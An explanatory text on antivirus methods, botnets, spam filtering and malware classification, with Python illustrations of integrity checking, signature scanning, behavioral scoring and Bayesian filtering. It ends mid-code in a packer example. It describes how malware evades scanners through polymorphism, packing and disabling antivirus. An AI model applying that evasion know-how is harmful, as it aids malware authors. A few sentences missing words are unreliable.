Methods by which malware penetrates a system. Methods and means of protection against malware and unauthorized copying of information. Counteracting malware

Prevention means preventing infection (modification) of files or the operating system by malicious software.

Virus protection methods

Three groups of methods are used to protect against viruses:

  1. Methods based on analysis of file content (both data files and files containing commands). This group includes scanning for virus signatures, integrity checking and scanning for suspicious commands.
  2. Methods based on tracking the behavior of programs as they execute. These methods log every security-relevant event that occurs either during actual execution of the object under test or during its software emulation.
  3. Methods that regulate procedures for working with files and programs. These are administrative security measures.

The signature scanning method (signature analysis, signature method) is based on searching files for a unique sequence of bytes, a signature, that is characteristic of a particular virus. For each newly discovered virus, antivirus laboratory specialists perform an analysis on the basis of which its signature is determined. The resulting virus fragment is placed in a special virus signature database that the antivirus program works with. The advantage of this method is its relatively low proportion of false positives; its main disadvantage is that it is fundamentally impossible to detect a new virus for which there is no signature in the antivirus database, so the signature database must be updated promptly.

The integrity control method is based on the fact that any unexpected and causeless change in data on the disk is a suspicious event requiring the special attention of the antivirus system. A virus necessarily leaves evidence of its presence (changes in the data of existing files, especially system or executable ones, the appearance of new executable files, etc.). The fact of a data change, an integrity violation, is easily established by comparing a checksum (digest) calculated in advance for the initial state of the object under test with the checksum (digest) of its current state. If they do not match, integrity has been violated and there is every reason to carry out an additional check, for example by scanning for virus signatures. This method works faster than signature scanning, since calculating checksums requires less computation than byte-by-byte comparison against virus fragments; in addition, it detects traces of the activity of any virus, including unknown ones for which no signatures exist yet in the database.

The method of scanning for suspicious commands (heuristic scanning, heuristic method) is based on identifying in the scanned file a certain number of suspicious commands and (or) signs of suspicious sequences (for example, a command to format the hard disk, or a function that injects into a running or executable process). After this, an assumption is made about the malicious nature of the file and additional steps are taken to check it. This method is fast, but quite often it is not able to detect new viruses.
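As an added illustration of the integrity control and signature scanning methods above (example code written for this page, not from any antivirus product), the following Python script records a digest baseline of a directory, reports files that changed or appeared, and then runs a signature scan only over those files. The directory contents and the “demo-sig” byte pattern are constructed for the example; the EICAR string is the standard harmless antivirus test signature.

```python
import hashlib
import os
import tempfile

# Constructed signature database. Each entry is a byte pattern and an optional
# offset at which it must appear (None = anywhere in the file). The EICAR test
# string is the industry-standard harmless test signature; "demo-sig" is made up.
SIGNATURES = {
    "EICAR-Test-File": {
        "pattern": rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*",
        "offset": 0,
    },
    "demo-sig": {"pattern": b"\xde\xad\xbe\xef\x42", "offset": None},
}


def file_digest(path, algo="sha256"):
    """Checksum (digest) of a file, read in chunks so large files are not loaded whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record the digest of every file under root: the 'initial state' of the objects."""
    baseline = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            baseline[os.path.relpath(path, root)] = file_digest(path)
    return baseline


def check_integrity(root, baseline):
    """Compare the current state with the baseline; returns (modified, added, removed)."""
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def scan_signatures(path, signatures=SIGNATURES):
    """Signature scan of one file: returns the names of all signatures that match."""
    with open(path, "rb") as f:
        data = f.read()
    hits = []
    for name, sig in signatures.items():
        pat, off = sig["pattern"], sig["offset"]
        if off is None:
            if pat in data:
                hits.append(name)
        elif data[off:off + len(pat)] == pat:      # fixed-offset signature
            hits.append(name)
    return hits


def demo():
    """Build a baseline, simulate a change, then signature-scan only what changed."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "app.bin"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 64)           # constructed 'executable'
    with open(os.path.join(root, "notes.txt"), "wb") as f:
        f.write(b"hello")
    baseline = build_baseline(root)
    # Simulate an infection: an existing executable is altered and a new file appears.
    with open(os.path.join(root, "app.bin"), "ab") as f:
        f.write(b"\xde\xad\xbe\xef\x42")
    with open(os.path.join(root, "dropped.com"), "wb") as f:
        f.write(SIGNATURES["EICAR-Test-File"]["pattern"])
    modified, added, removed = check_integrity(root, baseline)
    # The cheap integrity check is the first pass; the signature scan runs only on
    # the files it flagged, which is why the combined approach is fast.
    findings = {p: scan_signatures(os.path.join(root, p)) for p in modified + added}
    return modified, added, removed, findings


if __name__ == "__main__":
    print(demo())
```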

The method of tracking program behavior is fundamentally different from the file-content scanning methods described above. It is based on analyzing the behavior of running programs, comparable to catching a criminal red-handed at the crime scene. Antivirus tools of this type often require the active participation of the user, who is called upon to make decisions in response to numerous system warnings, many of which may later turn out to be false alarms. When the frequency of false positives (suspecting a harmless file of being a virus, or missing a malicious file) exceeds a certain threshold, the method becomes ineffective: the user may stop responding to warnings or choose an optimistic strategy (allow all actions to all running programs, or disable this antivirus feature). With antivirus systems that analyze program behavior there is always a risk of executing virus commands that can damage the protected computer or network. To eliminate this drawback, the emulation (simulation) method was later developed, which runs the program under test in an artificially created (virtual) environment, often called a sandbox, without risk of damaging the information environment. Methods of analyzing program behavior have shown high effectiveness in detecting both known and unknown malware.

False antiviruses

In 2009, the active spread of false antiviruses began: software that is not antivirus software (that is, has no real functionality to counteract malware) but pretends to be. In practice, false antiviruses are either programs that deceive users in order to make a profit from payments for “curing the system of viruses,” or ordinary malicious software.

Special antiviruses

In November 2014, the international human rights organization Amnesty International released Detect, an anti-virus program designed to detect malware distributed by government agencies to spy on civil activists and political opponents. The antivirus, according to the creators, performs a deeper scan of the hard drive than conventional antiviruses.

Antivirus effectiveness

The analytical company Imperva, as part of the Hacker Intelligence Initiative, published an interesting study that shows the low effectiveness of most antiviruses in real conditions.

According to the results of various synthetic tests, antiviruses show an average efficiency of around 97%, but these tests are carried out on databases of hundreds of thousands of samples, the vast majority of which (maybe about 97%) are no longer used to carry out attacks.

The question is how effective antiviruses are against the most current threats. To answer this question, Imperva and students from Tel Aviv University obtained 82 samples of the latest malware from Russian underground forums and tested them against VirusTotal, that is, against 42 antivirus engines. The result was disastrous.

  1. The effectiveness of antiviruses against newly compiled malware was less than 5%. This is a completely logical result, since virus creators always test them against the VirusTotal database.
  2. It takes up to four weeks from the appearance of the virus until it begins to be recognized by antiviruses. This figure is achieved by “elite” antiviruses, while for other antiviruses the period can reach up to 9-12 months. For example, at the beginning of the study on February 9, 2012, a fresh sample of the fake Google Chrome installer was tested. After the end of the study on November 17, 2012, only 23 out of 42 antiviruses detected it.
  3. Antiviruses with the highest percentage of malware detection also have a high percentage of false positives.
  4. Although the study can hardly be called objective, because the sample of malware was too small, it can be assumed that antiviruses are completely unsuitable against new cyber threats.

Classifications of antivirus programs

Antivirus programs are divided by their implementation (the means of blocking) into:

  • software;
  • software and hardware.

Based on placement in RAM, the following are distinguished:

  • resident (they begin their work when the operating system starts, are constantly in the computer’s memory and automatically scan files);
  • non-resident (launched at the user’s request or in accordance with the schedule specified for them).

Based on the type (method) of protection against viruses, there are:

In accordance with the regulatory legal act of the FSTEC of Russia “Requirements in the field of technical regulation for products used to protect information constituting a state secret or classified as other restricted-access information protected in accordance with the legislation of the Russian Federation (requirements for anti-virus protection means)” (approved by order of the FSTEC of Russia dated March 20, 2012 No. 28), the following types of anti-virus protection are distinguished:

  • type “A” (Cyrillic А) - anti-virus protection tools (components of anti-virus protection tools) intended for centralized administration of anti-virus protection tools installed on information system components (servers, automated workstations);
  • type “B” (Cyrillic Б) - anti-virus protection tools (components of anti-virus protection tools) intended for use on information system servers;
  • type “V” (Cyrillic В) - anti-virus protection tools (components of anti-virus protection tools) intended for use at automated workstations of information systems;
  • type “G” (Cyrillic Г) - anti-virus protection tools (components of anti-virus protection tools) intended for use on stand-alone automated workstations.

Anti-virus protection tools of type “A” are not used in information systems on their own and are intended for use only in conjunction with anti-virus protection tools of types “B” and (or) “V”.


The word "bot" is short for "robot". A bot is a piece of code that performs some function for its owner, the author of the code. Bots are a type of malware installed on thousands of computers. A computer on which a bot is installed is called a zombie. The bot receives commands from its owner and forces the infected computer to execute them. Such commands may be to send spam or viruses, or to carry out attacks. The attacker prefers to perform such actions using bots rather than his own computer, since this allows him to avoid detection and identification.

A set of zombie computers compromised by an attacker, on which bots are installed, is called a botnet. To create a botnet, hackers compromise thousands of systems by delivering malicious code in a variety of ways: as attachments to email messages, through compromised websites, by sending links to malicious sites in email messages, etc. Once successfully installed on the user's computer, the malicious code sends the attacker a message that the system has been compromised and is now at the attacker's disposal, to use at will. For example, he can use the botnet to carry out powerful attacks or rent it out to spammers. Moreover, most of the computers in a botnet are home computers of unsuspecting users.

The owner of this botnet controls the systems included in it remotely, usually through the IRC (Internet Relay Chat) protocol.

The basic steps for creating and using botnets are given below:

  1. The hacker uses various methods to send potential victims malicious code that contains bot software.
  2. After successful installation on the victim's system, the bot establishes contact with the botnet's control server, communicating with it via IRC or a special web server, in accordance with what is specified in its code. After this, the control server takes over control of the new bot.
  3. The spammer pays the hacker for using the systems of his botnet, the hacker sends the appropriate commands to the control server, and the control server, in turn, instructs all infected systems included in the botnet to send spam.

Spammers use this method because it significantly increases the likelihood of their messages reaching recipients and bypassing the spam filters they have installed: the messages are sent not from a single address, which would quickly be blocked or added to every “black list,” but from many real addresses belonging to the owners of the compromised computers.

To create a botnet, its future owner either does everything himself or pays hackers to develop and distribute the malware that infects the systems which will become part of his botnet. The botnet owner is then contacted and paid by those who want to advertise their new products, as well as by those who need to attack competitors, steal personal data or user passwords, and many others.

Traditional antivirus software uses signatures to detect malicious code. Signatures are fingerprints of malicious code created by the antivirus software manufacturer; a signature is a code fragment extracted from the virus itself. An antivirus program scans files, emails, and other data passing through certain systems and compares them against its database of virus signatures. When a match is detected, the antivirus program performs a pre-configured action, which may be quarantining the infected file, attempting to “cure” the file (remove the virus), displaying a warning window for the user, and/or recording an event in .

Signature-based detection of malicious code is an effective way to detect malware, but there are certain delays in responding to new threats. After a virus is first discovered, the antivirus manufacturer must study the virus, develop and test new signatures, release an update to the signature database, and all users must download the update. If the malicious code is simply sending your photos to all your friends, this delay is not so critical. However, if the malware is similar to the Slammer worm, the damage from such a delay could be catastrophic.

NOTE. The Slammer worm appeared in 2003. It exploited a vulnerability in the Microsoft SQL Server 2000 DBMS that allowed it to cause a denial of service. By some estimates, Slammer caused more than $1 billion in damage.

With new malware being created daily, it is difficult for antivirus software manufacturers to keep up. Virus signature technology detects viruses that have already been identified and for which a signature has been created. But because virus writers are so prolific and many viruses can change their code, it is important that antivirus software has other mechanisms for detecting malicious code.

Another method that almost all antivirus software products use is to detect malicious code based on heuristic analysis (heuristic detection). This method analyzes the overall structure of the malicious code, evaluates the instructions and algorithms executed by the code, and studies the types of data used by the malicious program. Thus, it collects a large amount of information about a piece of code and evaluates the likelihood that it is malicious in nature. It uses a kind of “suspiciousness counter”, which increases as the antivirus program finds new potentially dangerous (suspicious) properties in it. When a predetermined threshold is reached, the code is considered dangerous and the antivirus program initiates appropriate defense mechanisms. This allows antivirus software to recognize unknown malware instead of just relying on signatures.

Consider the following analogy. Ivan is a policeman; his job is to catch the bad guys and lock them up. If Ivan uses the signature method, he compares every person he sees on the street against a stack of photographs. When he sees a match, he quickly catches the bad guy and puts him in his patrol car. If he uses the heuristic method, he watches for suspicious activity. For example, if he sees a man in a ski mask standing in front of a bank, he assesses the likelihood that he is a robber and not just a cold guy asking bank customers for change.

NOTE. Diskless workstations are also vulnerable to viruses, despite the lack of a hard drive and a full-fledged operating system. They may be infected by viruses that download into and live in memory. Such systems can be rebooted remotely (remote reboot) to clear memory and return it to its original state, i.e. the virus lives only briefly in such a system.

Some antivirus products create an artificial environment called a virtual machine or sandbox and allow some of the suspicious code to run in this protected environment. This gives the antivirus program the ability to see the code in action, which provides much more information for deciding whether it is malicious or not.

NOTE. A virtual machine or sandbox is sometimes called an emulation buffer. This is the same as a protected memory segment, so even if the code does turn out to be malicious, the system still remains safe.

Analyzing information about a piece of code is called static analysis; running a piece of code on a virtual machine is called dynamic analysis. Both of these methods are considered heuristic detection methods.

Vaccination. Another approach that some antivirus programs have used is called vaccination (immunization). Products with this functionality made changes to files and disk areas to make them appear as if they were already infected. In this case the virus may decide that the file (disk) is already infected and will make no further changes, moving on to the next file.

A vaccination program, as a rule, is aimed at a specific virus, since each virus checks the fact of infection differently and looks for different data (signatures) in the file (on disk). However, the number of viruses and other malicious software is constantly growing, and so is the number of files that need to be protected, so this approach is no longer practical in most cases, and antivirus manufacturers no longer use it.

Currently, even with all these sophisticated and effective approaches, there is no absolute guarantee of the effectiveness of antivirus tools, since virus writers are very cunning. It is a constant game of cat and mouse that goes on every day: the antivirus industry finds a new way to detect malware, and the next week virus writers find a way around it. This forces antivirus manufacturers to constantly increase the intelligence of their products, and users have to buy new versions of them every year.

The next stage in the evolution of antivirus software is called behavioral blockers (behavior blocker). Antivirus software that performs behavioral blocking essentially allows suspicious code to run on an unprotected operating system and monitors its interaction with the operating system, paying attention to suspicious activity. Specifically, antivirus software monitors for the following types of activity:

  • Writing to files that are automatically loaded at system startup or to startup sections in the system registry
  • Opening, deleting or changing files
  • Including scripts in emails to send executable code
  • Connecting to network resources or shared folders
  • Changing the logic of executable code
  • Creating or modifying macros and scripts
  • Formatting the hard drive or writing to the boot sector

If an antivirus program detects some of these potentially dangerous activities, it can force the program to terminate and notify the user. The new generation of behavioral blockers actually analyzes the sequence of such actions before deciding that the system is infected (the first generation of behavioral blockers simply triggered on individual actions, which led to a large number of false positives). Modern antivirus software can intercept the execution of dangerous pieces of code and prevent them from interacting with other running processes. They can also detect . Some of these antivirus programs allow you to “roll back” the system to the state it was in before the infection, “erasing” all changes made by the malicious code.
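The following Python example (added for this page, not code from any product) contrasts the two generations of behavioral blockers described above, using a per-process “suspiciousness counter” of the kind the heuristic detection section describes: the first generation alerts on any single dangerous action, the second accumulates a weighted score over the sequence of actions and convicts only above a threshold. The event log, the activity weights and the thresholds are constructed assumptions for the example.

```python
from collections import defaultdict

# Activity classes the text lists for behavioral blocking, each with a weight.
# The weights are assumptions for this example, not values from any product.
WEIGHTS = {
    "write_autostart": 3,    # writing to startup folders or Run keys in the registry
    "modify_file": 1,        # opening, deleting or changing files
    "script_in_email": 3,    # including scripts in emails to send executable code
    "network_share": 2,      # connecting to network resources or shared folders
    "patch_code": 4,         # changing the logic of executable code
    "macro_create": 2,       # creating or modifying macros and scripts
    "write_boot_sector": 5,  # formatting the disk or writing to the boot sector
}

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed event log: (sequence number, process, activity class, detail).
# setup.exe and winword.exe are benign but each performs one "dangerous" action;
# invoice.scr performs a chain of them.
EVENTS = [
    (1, "setup.exe", "modify_file", r"C:\Program Files\App\app.exe"),
    (2, "setup.exe", "write_autostart", RUN_KEY + r"\App"),
    (3, "winword.exe", "macro_create", "Normal.dotm"),
    (4, "winword.exe", "modify_file", r"C:\Users\u\report.docx"),
    (5, "invoice.scr", "modify_file", r"C:\Users\u\AppData\Local\Temp\x.dll"),
    (6, "invoice.scr", "write_autostart", RUN_KEY + r"\x"),
    (7, "invoice.scr", "patch_code", r"C:\Windows\System32\calc.exe"),
    (8, "invoice.scr", "network_share", r"\\fileserver\public"),
    (9, "invoice.scr", "script_in_email", "outlook automation"),
]


def first_generation(events, weights=WEIGHTS, alert_weight=2):
    """First-generation blocker: every single dangerous action is an alert by itself."""
    return [(seq, proc, act) for seq, proc, act, _ in events
            if weights.get(act, 0) >= alert_weight]


def second_generation(events, weights=WEIGHTS, threshold=8, min_distinct=3):
    """Second-generation blocker: keep a per-process suspiciousness counter and declare
    infection only when both the accumulated score and the variety of dangerous
    actions cross a threshold. Returns ({process: event at which it is convicted},
    {process: final score})."""
    score = defaultdict(int)
    kinds = defaultdict(set)
    verdicts = {}
    for seq, proc, act, _ in events:
        score[proc] += weights.get(act, 0)
        kinds[proc].add(act)
        if (proc not in verdicts and score[proc] >= threshold
                and len(kinds[proc]) >= min_distinct):
            verdicts[proc] = seq  # the point at which the process would be terminated
    return dict(verdicts), dict(score)


def false_positive_alerts(events):
    """First-generation alerts raised for processes the sequence analysis never convicts."""
    alerts = first_generation(events)
    verdicts, _ = second_generation(events)
    return [a for a in alerts if a[1] not in verdicts]


if __name__ == "__main__":
    print("gen 1 alerts:", first_generation(EVENTS))
    print("gen 2 verdicts, scores:", second_generation(EVENTS))
    print("gen 1 alerts on benign processes:", false_positive_alerts(EVENTS))
```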

It would seem that behavioral blockers could completely solve all the problems associated with malicious code, but they have one drawback: they must monitor malicious code in real time, otherwise the system may still be infected. In addition, constant monitoring requires a large amount of system resources...

NOTE. Heuristic analysis and behavior-based blocking are considered proactive techniques and can detect new malware, sometimes called zero-day attacks. Signature-based malware detection cannot identify new malware.

Most antivirus programs use a combination of all of these technologies to provide the best protection possible. Selected anti-malware solutions are shown in Figure 9-20.

Figure 9-20. Antivirus software makers use different methods to detect malicious code



We are all very tired of emails asking us to buy something we do not need. Such messages are called spam: unwanted email messages. Spam not only distracts its recipients from their work but consumes significant network bandwidth and can also be a source of malware. Many companies use spam filters on their email servers, and users can configure spam filtering rules in their email clients. But spammers, like virus writers, are constantly coming up with new and ingenious ways to bypass spam filters.

Effective spam detection has become a real science. One of the methods used is called Bayesian filtering. Many years ago, a mathematician named Thomas Bayes developed an effective way of predicting the probability of events mathematically. Bayes' theorem allows us to determine the probability that an event occurred given only indirect evidence (data), which may be inaccurate. Conceptually, this is not that difficult to understand. If you hit your head against a brick wall three times and fell each time, you might conclude that trying again will produce the same painful result. It becomes more interesting when this logic is applied to actions that involve many more variables. For example, how does a spam filter work that blocks letters offering to sell you Viagra, but does not prevent the delivery of mail from your friend who is very interested in this drug and writes you messages about its properties and effects on the body? The Bayesian filter applies statistical modeling to the words that make up email messages. Mathematical formulas are applied to these words to understand fully their relationship to each other. The Bayesian filter performs frequency analysis on each word and then evaluates the message as a whole to determine whether it is spam or not.

This filter doesn't just look for the words "Viagra," "sex," etc., it looks at how often those words are used and in what order to determine whether a message is spam. Unfortunately, spammers know how these filters work and manipulate words in the subject line and body of the message to try to fool the spam filter. This is why you may receive spam messages with misspellings or words that use symbols instead of letters. Spammers are very interested in you receiving their messages because they make a lot of money from it.
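A minimal Bayesian spam filter of the kind described above, added as an illustration for this page (not code from any mail product): it learns per-word spam probabilities from a constructed training corpus and combines them in log space to score a whole message, so that “viagra” in a friend's message about the drug is outweighed by the other words. The corpus, the add-one smoothing and the 0.9 threshold are assumptions of the example.

```python
import math
import re
from collections import Counter

TOKEN = re.compile(r"[a-z0-9]+")


def tokenize(text):
    """Lower-case word tokens; a spammer's misspelling ("v1agra") becomes a new, unknown word."""
    return TOKEN.findall(text.lower())


class BayesFilter:
    """Word-presence naive Bayes classifier in the style of early Bayesian spam filters."""

    def __init__(self):
        self.spam_words = Counter()   # in how many spam messages each word appeared
        self.ham_words = Counter()    # in how many legitimate messages each word appeared
        self.spam_msgs = 0
        self.ham_msgs = 0

    def train(self, text, is_spam):
        # Count each word once per message so one repeated word cannot dominate.
        words = set(tokenize(text))
        if is_spam:
            self.spam_msgs += 1
            self.spam_words.update(words)
        else:
            self.ham_msgs += 1
            self.ham_words.update(words)

    def word_spam_probability(self, word):
        """P(spam | word) with add-one smoothing: a never-seen word is neutral (0.5)."""
        p_w_spam = (self.spam_words[word] + 1) / (self.spam_msgs + 2)
        p_w_ham = (self.ham_words[word] + 1) / (self.ham_msgs + 2)
        return p_w_spam / (p_w_spam + p_w_ham)

    def score(self, text):
        """Combine the per-word probabilities of a message into one spam probability."""
        log_spam = log_ham = 0.0
        for word in set(tokenize(text)):
            p = self.word_spam_probability(word)
            log_spam += math.log(p)
            log_ham += math.log(1.0 - p)
        # P = prod(p) / (prod(p) + prod(1 - p)), computed in log space to avoid underflow
        return 1.0 / (1.0 + math.exp(log_ham - log_spam))

    def is_spam(self, text, threshold=0.9):
        return self.score(text) >= threshold


def trained_filter():
    """Build a filter from a small constructed corpus (not real mail)."""
    f = BayesFilter()
    spam = [
        "buy viagra now cheap pills online order today",
        "cheap viagra order online discount pills click now",
        "win money now click here free prize",
        "order cheap pills online free shipping click",
    ]
    ham = [
        "hi, read the paper on viagra and heart properties, interesting effects on the body",
        "meeting tomorrow about the project report",
        "the paper discusses the effects of the drug on blood pressure",
        "lunch tomorrow? let me know",
    ]
    for text in spam:
        f.train(text, True)
    for text in ham:
        f.train(text, False)
    return f


if __name__ == "__main__":
    f = trained_filter()
    for msg in ("cheap viagra pills order now online",
                "interesting effects of viagra on the body, see the paper"):
        print(f"{f.score(msg):.4f}", "SPAM" if f.is_spam(msg) else "ham ", msg)
```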

Protecting companies from a wide variety of malware requires more than just antivirus software. As with other components, certain additional administrative, physical, and technical safeguards are required to be implemented and maintained.

The company must have a separate antivirus policy, or antivirus protection issues must be addressed in the general security policy. Standards must be developed that define the types of antivirus and anti-spyware software required for use in the company, as well as the main parameters of their configuration.

Information about virus attacks, the antivirus protection tools used, and the behavior expected of users should be provided in the program. Every user should know what to do and whom to contact if a virus is detected on their computer. The standard must address all issues related to user actions in connection with malicious code, and must indicate what the user must do and what he is prohibited from doing. In particular, the standard should address the following points:

  • Anti-virus software must be installed on every workstation, server, communicator, and smartphone.
  • Each of these devices must have a way to automatically update antivirus signatures, which must be enabled and configured on each device.
  • The user should not be able to disable antivirus software.
  • The virus removal process must be developed and planned in advance, and a contact person must be identified and appointed in case malicious code is detected.
  • All external drives (USB drives, etc.) should be scanned automatically.
  • Backup files must be scanned.
  • Antivirus policies and procedures should be reviewed annually.
  • The antivirus software you use must provide protection against boot viruses.
  • Antivirus scanning must be performed independently on the gateway and on each individual device.
  • Anti-virus scanning should run automatically on a schedule. You don't have to rely on users to run scans manually.
  • Critical systems must be physically protected in such a way that local installation of malicious software on them is impossible.

Because malware can cause millions of dollars in damage (in operational costs and lost productivity), many companies install antivirus solutions at all network entry points. An antivirus scanner can be integrated into the mail server software, or . This antivirus scanner checks all incoming traffic for the presence of malicious code in order to detect and stop it in advance, before it reaches the internal network. Products that implement this functionality can scan traffic from SMTP, HTTP, FTP, and possibly other protocols. But it is important to understand that such a product monitors only one or two protocols, not all incoming traffic. This is one of the reasons why every server and workstation should also have antivirus software installed.

Article 273 of the Criminal Code of the Russian Federation understands malware to mean computer programs, or changes to existing programs, that “knowingly lead to unauthorized destruction, blocking, modification or copying of information, or disruption of the operation of a computer, computer system or their network.”

Microsoft Corporation uses the term malware, defining it as follows: “malware is an abbreviation for malicious software, usually used as a common term to refer to any software specifically designed to cause damage to an individual computer, server, or computer network, regardless of whether it is a virus, spyware, etc.”

The harm caused by such software may include damage to:

  • software and hardware of the computer (network) attacked by the intruder;
  • computer user data;
  • to the computer user himself (indirectly);
  • users of other computers (indirectly).

Specific damage to users and (or) owners of computer systems and networks may include the following:

  • leakage and (or) loss of valuable information (including financial information);
  • abnormal behavior of software installed in the system;
  • a sharp increase in incoming and (or) outgoing traffic;
  • slowdown or complete failure of the computer network;
  • loss of working time of the organization's employees;
  • the offender’s access to the resources of the corporate computer network;
  • risk of becoming a victim of fraud.

Signs of malware include the following:

  • hiding its presence in the computer system;
  • self-replication, attaching its code to other programs, transferring its code to previously unoccupied areas of computer memory;
  • distorting the code of other programs in the computer's RAM;
  • saving data from the RAM of other processes in other areas of the computer's memory;
  • distorting, blocking or substituting stored or transmitted data produced by other programs or already located in the computer's external memory;
  • incorrectly informing the user about the actions allegedly performed by the program.

A malicious program can have only one of the characteristics listed above or a combination of them. Obviously, the above list is not exhaustive.

Based on the presence of material benefits, malicious software (software) can be divided into:

  • not bringing direct material benefit to the person who developed (installed) the malicious program (developed based on hooliganism, “joke”, vandalism, including on religious, nationalist, political grounds, self-affirmation and the desire to confirm one’s qualifications);
  • bringing direct material benefit to the offender in the form of theft of confidential information, including gaining access to bank-client systems, obtaining PIN codes of credit cards and other personal data of the user, as well as gaining control over remote computer systems for the purpose of distributing spam from numerous “infected” computers (zombie computers).

Based on the purpose of development, malware can be divided into:

  • Software that was originally developed specifically to gain unauthorized access to information stored on a computer with the aim of causing damage to the owner of the information and (or) the owner of the computer (computer network);
  • Software that was not initially developed specifically to gain unauthorized access to information stored on a computer, and was not initially intended to cause damage to the owner of the information and (or) the owner of the computer (computer network).

Recently, there has been a criminalization of the malware creation industry, resulting in the following:

  • theft of confidential information (trade secrets, personal data);
  • creating zombie networks (“botnets”) designed to send spam, distributed denial of service attacks (DDoS attacks), and introducing Trojan proxy servers;
  • encryption of user information with subsequent blackmail and ransom demands;
  • attacks on antivirus products;
  • so-called phlashing (permanent denial of service, PDoS).

Denial of service attacks are now used not so much as a tool to extort money from victims, but as a means of political and competitive warfare. If previously DoS attacks were a tool in the hands of extortion hackers or hooligans only, now they have become the same commodity as spam mailings or custom-made malware. Advertising of DoS attack services has become commonplace, and prices are already comparable to the cost of organizing spam mailings.

Companies specializing in computer and network security are paying attention to a new type of threat, the so-called permanent denial of service (PDoS). This new type of attack has also been called phlashing. It is potentially capable of causing much more harm to a system than any other type of malicious network activity, since it is aimed at disabling the computer equipment itself. PDoS attacks are more effective and cheaper than traditional attacks, in which the hacker tries to install malware on the victim's system. In phlashing, the targets of the attack are the firmware in BIOS flash memory and device drivers, which, when damaged, disrupt the operation of the devices and are potentially capable of physically destroying them.

Another type of attack aimed at stealing confidential information is when attackers introduce a malicious program into a company’s information system that can block the operation of the system. At the next stage, the attacked company receives a letter from criminals demanding money for a password that will allow them to unlock the company’s computer system. Another similar way to make money illegally online is to launch Trojan programs into your computer that can encrypt data. The decryption key is also sent by criminals for a certain monetary reward.

The personal data of the user of the attacked computer that is of interest to the attacker includes:

  • documents and other user data stored in computer memory;
  • account names and passwords for access to various network resources (electronic money and payment systems, Internet auctions, Internet pagers, e-mail, Internet sites and forums, online games);
  • email addresses of other users, IP addresses of other computers on the network.

Thanks to the new opportunities provided by the Internet, and especially the widespread growth of social networks, an increasing number of people regularly use Internet resources and become victims of increasingly sophisticated attacks, whose purpose is both to steal confidential user data and to “zombify” their computers so that violators can subsequently use their resources.

The effective operation of a “zombie” network is determined by three components of which it conventionally consists:

  • a loader program whose task is to distribute its own code and the code of the bot program that performs the main work;
  • a bot program that collects and transmits confidential information, sends spam, takes part in DDoS attacks and performs other actions assigned to it by the violator;
  • a botnet control module that collects information from bot programs and sends them updates and, if necessary, new configuration files that “retarget” the bot programs.

Examples of the ways malware counteracts the antivirus software installed on the user's computer are:

  • forced stop of the anti-virus scanner or monitor;
  • changing the security system settings to facilitate the implementation and operation of the malicious program;
  • automatic clicking on the “Skip” button after the user receives a warning about detected malware;
  • hiding your presence in the system (so-called “rootkits”);
  • complicating anti-virus analysis through additional transformation of the malicious code (encryption, obfuscation, i.e. code scrambling, polymorphism, packing).

Until recent years, the work of anti-virus programs was based solely on analysis of the contents of the scanned object. At the same time, the earlier signature-based method of detecting viruses (the so-called scanning) used a search for fixed sequences of bytes, often at a certain offset from the beginning of the object, contained in the binary code of the malicious program. Heuristic analysis, which appeared a little later, also checked the contents of the object being scanned, but was based on a freer, probabilistic search for byte sequences characteristic of a potentially malicious program. Obviously, a malicious program will easily bypass such protection if each copy of it is a new set of bytes.

This is precisely the problem that polymorphism and metamorphism solve, the essence of which is that when creating its next copy, the malicious program completely changes at the level of the set of bytes that it consists of. However, its functionality remains unchanged.

Encryption and obfuscation (code obfuscation) themselves are primarily aimed at making it difficult to analyze program code, but, implemented in a certain way, they turn out to be types of polymorphism (for example, encrypting each copy of a virus with a unique key). Obfuscation itself only complicates analysis, but, used in a new way in each copy of the malware, it interferes with anti-virus scanning.

Polymorphism became relatively widespread only in the era of viruses that infect files. This is explained by the fact that writing polymorphic code is a very complex and resource-intensive task and is justified only in cases where the malicious program independently reproduces: each new copy of it is a more or less unique set of bytes. For most modern malware that does not have a self-replication function, this is not relevant. Therefore, polymorphism is not very common in malware at present.

Obfuscation and other code-modification methods, by contrast, largely solve the problem of complicating heuristic analysis rather than that of complicating scanning, and for that reason they do not lose their relevance.

To reduce the size of a file containing a malicious program, so-called packers are used: special programs that process the file on the principle of an archiver. A side effect of using packers, beneficial from the point of view of counteracting antivirus programs, is that antivirus scanning becomes somewhat more difficult.

This is explained by the fact that when developing a new modification of a malicious program, its author usually changes a few lines of code, leaving the core intact. In the executable code, the bytes in a certain part of the file change, and if the signature used by the antivirus program was not taken from that particular part, the malicious program will still be detected. Processing the program with a packer solves this problem, since changing even one byte in the original executable code results in a completely different set of bytes in the packed file.

Many modern packers, in addition to compressing the source file, provide it with additional self-defense functions aimed at making it difficult to unpack the file and analyze it using a debugger.
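The two effects described above, a signature that survives a small edit to the core code and a packer that destroys byte-level similarity until the object is unpacked, shown as an added example (not code from the original text or from any antivirus product). It assumes a constructed 128-byte "executable", a two-entry constructed signature database, and uses zlib as a stand-in for a packer; scan(), pack(), unpack() and byte_similarity() are names chosen here.

```python
"""Byte-signature scanning (fixed-offset and floating) and what a packer does to it.

Added example, not code from the original text. The "executable" and the
signature database are constructed byte strings; zlib stands in for a packer,
because the only property needed here is that compressed output shares almost
no bytes with its input.
"""
import zlib

# Constructed signature database: (name, byte sequence, offset or None).
# A fixed offset mimics early scanners that looked for the sequence at a known
# position; None means the sequence may occur anywhere in the object.
SIGNATURES = [
    ("Sample.A (fixed offset)", b"\x4d\x5a\x90\x00", 0),
    ("Sample.A (floating)", b"PAYLOAD-MARKER", None),
]


def scan(data: bytes) -> list[str]:
    """Return the names of every signature that matches data."""
    hits = []
    for name, sig, offset in SIGNATURES:
        if offset is None:
            found = sig in data
        else:
            found = data[offset:offset + len(sig)] == sig
        if found:
            hits.append(name)
    return hits


def pack(data: bytes) -> bytes:
    """Stand-in for a packer: compress the object. A real packer also prepends
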